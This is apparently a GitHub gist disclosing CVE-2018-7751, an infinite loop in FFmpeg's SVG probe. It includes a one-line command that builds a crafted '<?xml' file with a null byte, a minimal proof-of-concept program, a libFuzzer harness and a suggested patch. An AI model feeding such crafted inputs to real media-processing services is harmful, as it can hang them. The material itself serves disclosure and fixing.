Skip to content

Instantly share code, notes, and snippets.

@0xKira
Last active May 2, 2018 13:38
Show Gist options
  • Save 0xKira/09b8b4b02b2f951eadaafef6a29a59ff to your computer and use it in GitHub Desktop.
Save 0xKira/09b8b4b02b2f951eadaafef6a29a59ff to your computer and use it in GitHub Desktop.
CVE-2018-7751

I am trying to open a crafted XML file. And the program keep running without stopping.

In the function svg_probe from libavformat/img2dec.c

static int svg_probe(AVProbeData *p)
{
    const uint8_t *b = p->buf;
    const uint8_t *end = p->buf + p->buf_size;
    if (memcmp(p->buf, "<?xml", 5))
        return 0;
    while (b < end) {
        b += ff_subtitles_next_line(b);
        if (b >= end - 4)
            return 0;
        if (!memcmp(b, "<svg", 4))
            return AVPROBE_SCORE_EXTENSION + 1;
    }
    return 0;
}

When creating a crafted file started with "<?xml", if ff_subtitles_next_line return 0, the while in the function will loop infinitely. Let's take a look at ff_subtitles_next_line from libavformat/subtitles.h

static av_always_inline int ff_subtitles_next_line(const char *ptr)
{
    int n = strcspn(ptr, "\r\n");
    ptr += n;
    if (*ptr == '\r') {
        ptr++;
        n++;
    }
    if (*ptr == '\n')
        n++;
    return n;
}

If the provided string start with the null byte. The function will return 0. Try the poc:

First, generate a test file

echo -n "<?xml\x00AAAA" > test

then compile the poc.c

./poc

Build a latest ffmpeg executable also proves.

ffmpeg -i test test.out

Sugested patch is like the one in the source code:

mpsub_probe from libavformat/mpsubdec.c

static int mpsub_probe(AVProbeData *p)
{
    const char *ptr     = p->buf;
    const char *ptr_end = p->buf + p->buf_size;

    while (ptr < ptr_end) {
        int inc;

        if (!memcmp(ptr, "FORMAT=TIME", 11))
            return AVPROBE_SCORE_EXTENSION;
        if (!memcmp(ptr, "FORMAT=", 7))
            return AVPROBE_SCORE_EXTENSION / 3;
        inc = ff_subtitles_next_line(ptr);
        if (!inc)
            break;
        ptr += inc;
    }
    return 0;
}

Check the return value from ff_subtitles_next_line will work.

/*
* Copyright (c) 2010 Nicolas George
* Copyright (c) 2011 Stefano Sabatini
* Copyright (c) 2012 Clément Bœsch
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
// reference: ffmpeg/doc/examples
#include <unistd.h>
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
#include <libavfilter/buffersink.h>
#include <libavfilter/buffersrc.h>
#include <libavutil/opt.h>
static const char *filter_descr = "aresample=8000,aformat=sample_fmts=s16:channel_layouts=mono";
static const char *player = "ffplay -f s16le -ar 8000 -ac 1 -";
static AVFormatContext *fmt_ctx;
static AVCodecContext *dec_ctx;
AVFilterContext *buffersink_ctx;
AVFilterContext *buffersrc_ctx;
AVFilterGraph *filter_graph;
static int audio_stream_index = -1;
static int open_input_file(const char *filename)
{
int ret;
AVCodec *dec;
if ((ret = avformat_open_input(&fmt_ctx, filename, NULL, NULL)) < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot open input file\n");
return ret;
}
if ((ret = avformat_find_stream_info(fmt_ctx, NULL)) < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot find stream information\n");
return ret;
}
/* select the audio stream */
ret = av_find_best_stream(fmt_ctx, AVMEDIA_TYPE_AUDIO, -1, -1, &dec, 0);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot find an audio stream in the input file\n");
return ret;
}
audio_stream_index = ret;
/* create decoding context */
dec_ctx = avcodec_alloc_context3(dec);
if (!dec_ctx)
return AVERROR(ENOMEM);
avcodec_parameters_to_context(dec_ctx, fmt_ctx->streams[audio_stream_index]->codecpar);
av_opt_set_int(dec_ctx, "refcounted_frames", 1, 0);
/* init the audio decoder */
if ((ret = avcodec_open2(dec_ctx, dec, NULL)) < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot open audio decoder\n");
return ret;
}
return 0;
}
static int init_filters(const char *filters_descr)
{
char args[512];
int ret = 0;
const AVFilter *abuffersrc = avfilter_get_by_name("abuffer");
const AVFilter *abuffersink = avfilter_get_by_name("abuffersink");
AVFilterInOut *outputs = avfilter_inout_alloc();
AVFilterInOut *inputs = avfilter_inout_alloc();
static const enum AVSampleFormat out_sample_fmts[] = {AV_SAMPLE_FMT_S16, -1};
static const int64_t out_channel_layouts[] = {AV_CH_LAYOUT_MONO, -1};
static const int out_sample_rates[] = {8000, -1};
const AVFilterLink *outlink;
AVRational time_base = fmt_ctx->streams[audio_stream_index]->time_base;
filter_graph = avfilter_graph_alloc();
if (!outputs || !inputs || !filter_graph)
{
ret = AVERROR(ENOMEM);
goto end;
}
/* buffer audio source: the decoded frames from the decoder will be inserted here. */
if (!dec_ctx->channel_layout)
dec_ctx->channel_layout = av_get_default_channel_layout(dec_ctx->channels);
snprintf(args, sizeof(args),
"time_base=%d/%d:sample_rate=%d:sample_fmt=%s:channel_layout=0x%" PRIx64,
time_base.num, time_base.den, dec_ctx->sample_rate,
av_get_sample_fmt_name(dec_ctx->sample_fmt), dec_ctx->channel_layout);
ret = avfilter_graph_create_filter(&buffersrc_ctx, abuffersrc, "in",
args, NULL, filter_graph);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot create audio buffer source\n");
goto end;
}
/* buffer audio sink: to terminate the filter chain. */
ret = avfilter_graph_create_filter(&buffersink_ctx, abuffersink, "out",
NULL, NULL, filter_graph);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot create audio buffer sink\n");
goto end;
}
ret = av_opt_set_int_list(buffersink_ctx, "sample_fmts", out_sample_fmts, -1,
AV_OPT_SEARCH_CHILDREN);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot set output sample format\n");
goto end;
}
ret = av_opt_set_int_list(buffersink_ctx, "channel_layouts", out_channel_layouts, -1,
AV_OPT_SEARCH_CHILDREN);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot set output channel layout\n");
goto end;
}
ret = av_opt_set_int_list(buffersink_ctx, "sample_rates", out_sample_rates, -1,
AV_OPT_SEARCH_CHILDREN);
if (ret < 0)
{
av_log(NULL, AV_LOG_ERROR, "Cannot set output sample rate\n");
goto end;
}
/*
* Set the endpoints for the filter graph. The filter_graph will
* be linked to the graph described by filters_descr.
*/
/*
* The buffer source output must be connected to the input pad of
* the first filter described by filters_descr; since the first
* filter input label is not specified, it is set to "in" by
* default.
*/
outputs->name = av_strdup("in");
outputs->filter_ctx = buffersrc_ctx;
outputs->pad_idx = 0;
outputs->next = NULL;
/*
* The buffer sink input must be connected to the output pad of
* the last filter described by filters_descr; since the last
* filter output label is not specified, it is set to "out" by
* default.
*/
inputs->name = av_strdup("out");
inputs->filter_ctx = buffersink_ctx;
inputs->pad_idx = 0;
inputs->next = NULL;
if ((ret = avfilter_graph_parse_ptr(filter_graph, filters_descr,
&inputs, &outputs, NULL)) < 0)
goto end;
if ((ret = avfilter_graph_config(filter_graph, NULL)) < 0)
goto end;
/* Print summary of the sink buffer
* Note: args buffer is reused to store channel layout string */
outlink = buffersink_ctx->inputs[0];
av_get_channel_layout_string(args, sizeof(args), -1, outlink->channel_layout);
av_log(NULL, AV_LOG_INFO, "Output: srate:%dHz fmt:%s chlayout:%s\n",
(int)outlink->sample_rate,
(char *)av_x_if_null(av_get_sample_fmt_name(outlink->format), "?"),
args);
end:
avfilter_inout_free(&inputs);
avfilter_inout_free(&outputs);
return ret;
}
static void print_frame(const AVFrame *frame)
{
const int n = frame->nb_samples * av_get_channel_layout_nb_channels(frame->channel_layout);
const uint16_t *p = (uint16_t *)frame->data[0];
const uint16_t *p_end = p + n;
while (p < p_end)
{
fputc(*p & 0xff, stdout);
fputc(*p >> 8 & 0xff, stdout);
p++;
}
fflush(stdout);
}
struct MyIOContext
{
AVIOContext *ioCtx;
//buffer contains data generated by libfuzzer
const uint8_t *user_buf;
const uint8_t *user_buf_end;
const uint8_t *cur_pos;
size_t user_buf_size;
uint8_t *ff_buffer; //internal buffer for ffmpeg
int ff_bufferSize; //buffer size for ffmpeg
};
struct MyIOContext IOCtx;
//自定义的 read 函数,data 可以是用户传递的任意一个指针,等于传递给avio_alloc_context函数的第四个参数
//函数的作用是读取最多 buf_size个字节到 buf 中,返回实际读取的字节数,如果没有字节可以读取了,返回AVERROR_EOF
static int IOReadFunc(void *data, uint8_t *buf, int buf_size)
{
struct MyIOContext *hctx = (struct MyIOContext *)data;
int read_size = FFMIN(buf_size, hctx->user_buf_end - hctx->cur_pos);
if (read_size <= 0)
{
// Let FFmpeg know that we have reached EOF, or do something else
return AVERROR_EOF;
}
//printf("cur ptr:%p left size:%zu\n", hctx->cur_pos, hctx->user_buf_left_size);
/* copy internal buffer data to buf */
memcpy(buf, hctx->cur_pos, read_size);
hctx->cur_pos += read_size;
return read_size;
}
// whence: SEEK_SET, SEEK_CUR, SEEK_END (like fseek) and AVSEEK_SIZE(返回整个文件的大小)
static int64_t IOSeekFunc(void *data, int64_t offset, int whence)
{
//printf("IOSeekFunc() ");
struct MyIOContext *hctx = (struct MyIOContext *)data;
if (whence == AVSEEK_SIZE)
{
//printf("SEEK_SIZE size is %lu\n", hctx->user_buf_size);
// return the file size if you wish to
return hctx->user_buf_size;
}
//int64_t new_pos = 0; // 可以为负数
switch (whence)
{
case SEEK_SET:
//printf("SEEK_SET");
hctx->cur_pos = hctx->user_buf + offset;
//new_pos = offset;
break;
case SEEK_CUR:
//printf("SEEK_CUR");
hctx->cur_pos = hctx->cur_pos + offset;
//new_pos = hctx->pos + offset;
break;
case SEEK_END:
//printf("SEEK_END");
//new_pos = hctx->user_buf_size + offset;
hctx->cur_pos = hctx->user_buf_end + offset;
break;
default:
return -1;
}
//文件指针的当前位置不能超出 buffer 的开头或结尾
hctx->cur_pos = FFMIN(hctx->cur_pos, hctx->user_buf_end);
hctx->cur_pos = FFMAX(hctx->cur_pos, hctx->user_buf);
//printf(" offset 0x%lx, new position:0x%lx\n", offset, hctx->cur_pos - hctx->user_buf);
//返回值似乎没用到,仿照 fseek 返回0代表成功吧
return 0;
}
static void initMyIOContext(const uint8_t *data, size_t size)
{
IOCtx.user_buf = data; //这里直接指向 libfuzzer 提供的 data 指针,也可以考虑 memcpy 到一块新的区域
IOCtx.cur_pos = data;
IOCtx.user_buf_size = size;
IOCtx.user_buf_end = data + size;
//user_buf_left_size = user_buf_size;
// allocate buffer
IOCtx.ff_bufferSize = 4096;
IOCtx.ff_buffer = (uint8_t *)av_malloc(4096); // see destructor for details
// allocate the AVIOContext, 最核心的函数
IOCtx.ioCtx = avio_alloc_context(
IOCtx.ff_buffer, IOCtx.ff_bufferSize, // internal buffer and its size
0, // write flag (1=true, 0=false)
(void *)&IOCtx, // user data, will be passed to our callback functions
IOReadFunc,
0, // no writing
IOSeekFunc);
}
void initAVFormatContext(AVFormatContext *pCtx)
{
pCtx->pb = IOCtx.ioCtx; //让pb指向自己定义的ioCtx
}
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
int ret;
AVPacket packet;
AVFrame *frame = av_frame_alloc();
AVFrame *filt_frame = av_frame_alloc();
/* if(size==0)return 0; */
avfilter_register_all();
fmt_ctx = avformat_alloc_context();
initMyIOContext(data, size);
initAVFormatContext(fmt_ctx);
if ((ret = open_input_file(NULL)) < 0)
goto end;
if ((ret = init_filters(filter_descr)) < 0)
goto end;
// /* read all packets */
// while (1)
// {
// if ((ret = av_read_frame(fmt_ctx, &packet)) < 0)
// break;
// if (packet.stream_index == audio_stream_index)
// {
// ret = avcodec_send_packet(dec_ctx, &packet);
// if (ret < 0)
// {
// av_log(NULL, AV_LOG_ERROR, "Error while sending a packet to the decoder\n");
// break;
// }
// while (ret >= 0)
// {
// ret = avcodec_receive_frame(dec_ctx, frame);
// if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF)
// {
// break;
// }
// else if (ret < 0)
// {
// av_log(NULL, AV_LOG_ERROR, "Error while receiving a frame from the decoder\n");
// goto end;
// }
// if (ret >= 0)
// {
// /* push the audio data from decoded frame into the filtergraph */
// if (av_buffersrc_add_frame_flags(buffersrc_ctx, frame, AV_BUFFERSRC_FLAG_KEEP_REF) < 0)
// {
// av_log(NULL, AV_LOG_ERROR, "Error while feeding the audio filtergraph\n");
// break;
// }
// /* pull filtered audio from the filtergraph */
// while (1)
// {
// ret = av_buffersink_get_frame(buffersink_ctx, filt_frame);
// if (ret == AVERROR(EAGAIN) || ret == AVERROR_EOF)
// break;
// if (ret < 0)
// goto end;
// // print_frame(filt_frame);
// av_frame_unref(filt_frame);
// }
// av_frame_unref(frame);
// }
// }
// }
// av_packet_unref(&packet);
// }
end:
avfilter_graph_free(&filter_graph);
avcodec_free_context(&dec_ctx);
avformat_close_input(&fmt_ctx);
av_frame_free(&frame);
av_frame_free(&filt_frame);
// avfilter_free(buffersink_ctx);
// avfilter_free(buffersrc_ctx);
// destory_MyIOContext();
av_free(IOCtx.ioCtx->buffer);
av_free(IOCtx.ioCtx);
return 0;
}
// compile:
// clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link,fuzzer ./fuzzer.c -o ./fuzzer -I. -Llibavcodec -Llibavdevice -Llibavfilter -Llibavformat -Llibavresample -Llibavutil -Llibpostproc -Llibswscale -Llibswresample -Wl,--as-needed -Wl,-z,noexecstack -Wl,--warn-common -Wl,-rpath-link=libpostproc:libswresample:libswscale:libavfilter:libavdevice:libavformat:libavcodec:libavutil:libavresample -lavdevice -lavfilter -lavformat -lavcodec -lswresample -lswscale -lavutil -ldl -lxcb -lxcb-shm -lxcb -lxcb-xfixes -lxcb -lxcb-shape -lxcb -lX11 -lasound -lm -lbz2 -lz -pthread
#include <libavformat/avformat.h>
int main() {
AVFormatContext *fmt_ctx;
avformat_open_input(&fmt_ctx, "test", NULL, NULL);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment